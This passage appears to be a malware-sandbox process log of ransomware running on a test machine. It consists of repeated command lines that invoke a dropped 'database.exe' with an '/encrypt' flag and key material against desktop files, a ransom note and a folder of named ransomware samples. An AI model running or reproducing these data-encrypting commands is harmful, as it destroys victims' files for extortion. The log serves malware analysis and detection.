                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\UnblockRestore.jtx.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\uWPwQFnd-mjxwmm85.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\WriteResolve.dib.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\WZos2rLV-wyxty8Lk.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\[HOW_TO_DECRYPT_FILES].html"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\2aua0mwa.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.MSIL.Blocker.gen-57c4578f5aeecf623987474b555093aef07bed73797aca041afd31e0e67351ef.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.MSIL.Crypmod.gen-d5086f660b09c07006a213469edbb78549596e9231953993cc7ab43f14a1caec.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.MSIL.Encoder.gen-26750ee4c44e015354e290cf0f064a52340e623fc5df8986d9c4c3dce62cd066.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1648
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3068
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Documents\BackupConvert.vsx.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
